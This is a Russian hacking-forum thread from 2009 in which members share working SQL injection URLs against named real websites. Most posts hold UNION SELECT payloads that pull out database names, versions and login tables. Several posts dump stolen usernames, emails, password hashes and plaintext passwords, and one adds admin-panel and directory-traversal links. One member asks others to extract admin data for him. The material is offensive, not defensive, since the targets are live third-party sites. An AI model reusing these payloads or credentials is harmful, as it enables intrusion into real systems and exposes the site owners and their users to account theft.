HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.05.2009, 17:37
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

http://www.derechoshumanos.org.mx/modules.php?name=News&file=article&sid=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14

Вот только скобки фильтруются...
 
Ответить с цитированием

  #2  
Старый 09.05.2009, 18:24
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

Target: metrocasas.com.mx

Evil link: http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,2,3,4

Database info (user:version:database):
visiondig@localhost:4.1.21-standard-log:visiondig_metro

Users:
http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,group_concat(login,0x3a,password ),3,4+from+users
 
Ответить с цитированием

  #3  
Старый 09.05.2009, 19:05
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
По умолчанию

http://www.islam.com.mx/quiz_output.php?quiz_id=2%27/**/union/**/select+1,password,username,4,5,6,7,8,9+from+user/*

login: smontiel
pass: 445339 (за пасс благодарю поисковую систему гугл)

Последний раз редактировалось jokester; 09.05.2009 в 19:13.. Причина: шеллы запрещены
 
Ответить с цитированием

  #4  
Старый 09.05.2009, 19:30
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
По умолчанию

http://cambiodeluces.arts-history.mx/entrada.php?id=-254+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8--

Database Version: 5.0.45-log
Database name: neoartes
User name: neoartes@localhost

[QUOTE]Getting Data from table blog_users from database neoartes
Fields username:emailassword

[0]:adminblogs:soporte@arts-history.mx:
[1]:mzavala:mzavala@arts-history.mx:85870bafb753ce276bfdb55c5e5630e3:Nr4HLK PIcVkaFMWpZMzeMd2LbknTKZ

Getting Data from table phpSP_users from database neoartes
Fields userassword

[0]:mzavala@arts-history.mx:
[1]ostafoto@prodigy.net.mx:ranita
[2]:correo@arts-history.mx:HNEJBQ
[3]:redaccion:noticias2008


Getting Data from table sre_sp_users from database neoartes
Fields userassword

[0]:admin:admin
[1]:usuario:usuario
 
Ответить с цитированием

  #5  
Старый 09.05.2009, 20:17
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.kvbpr.com {PR 3}
Код:
http://www.kvbpr.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
5.0.67-community : kvbpr_kvbpr08 : kvbpr_idesign@localhost

table users:
Код:
http://www.kvbpr.com/news.php?id=-1+union+select+1,group_concat(name,0x3a,pass),3,4,5+from+users--
 
Ответить с цитированием

  #6  
Старый 09.05.2009, 21:53
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

Код:
http://www.technolex-anwaelte.de/index.php?id=43&news_id=1+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
php-info:
Код:
http://www.technolex-anwaelte.de/info.php
админка:
Код:
http://www.technolex-anwaelte.de/admin/
Просмотр дир:
Код:
http://www.technolex-anwaelte.de/admin/index_upload.php?dir=../
Пароли к админке:
1:technolex:technolex!
2:14v:14v
 
Ответить с цитированием

  #7  
Старый 09.05.2009, 23:53
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
По умолчанию

http://kiteonline.net/pages/news_detail.php?id=-34+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11

Database Version: 5.0.67-community
Database name: kiteonli_dbkite
User name: kiteonli_kitesit@localhost

In database kiteonli_dbkite found table adminusers
1 : firstname
2 : lastname
3 : email
4 : username
5 : password
6 : approval
7 : tbDate
8 : userid
 
Ответить с цитированием

  #8  
Старый 10.05.2009, 00:07
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
По умолчанию

Код:
http://www.stadiya.ru/news/?id=-434+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
stadiya_@imarket1.2x4.ru:stadiya_:4.1.22-log

тИЦ: 100
PR:4
 
Ответить с цитированием

  #9  
Старый 10.05.2009, 00:48
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://www.sim.misto.zp.ua/show.php?id=-746+union+sele ct+concat(u ser(),0x0B,database(),0x0B,version())+--+
Цитата:
mistozpu_misto@localhost
mistozpu_smile
5.0.67-community-log
http://www.sim.misto.zp.ua/show.php?id=-746+union+select+concat(TABLE_NAME,0x0B,COLUMN _NAME)+from+information_schema.columns+lim it+179,10+--+

Цитата:
table: admin
columns: password
вот только немогу ниче с табл админ взять, не пойму че это, если у кого получется стянуть с админа свисните в личку, пасиб
 
Ответить с цитированием

  #10  
Старый 10.05.2009, 01:16
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию

_http://www.mango-mango.ru/news/index.php?page=single&rec=21
_http://www.mango-mango.ru/news/index.php?page=single&rec=21+order+by+7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,2,3,4,5,6,7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,version(),database(),4,user(),6, 7+--+

version - 4.1.22-sta
database - mangoman_base
user - mangoman_user@localhost

Таблицы:
customers
articles
news
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.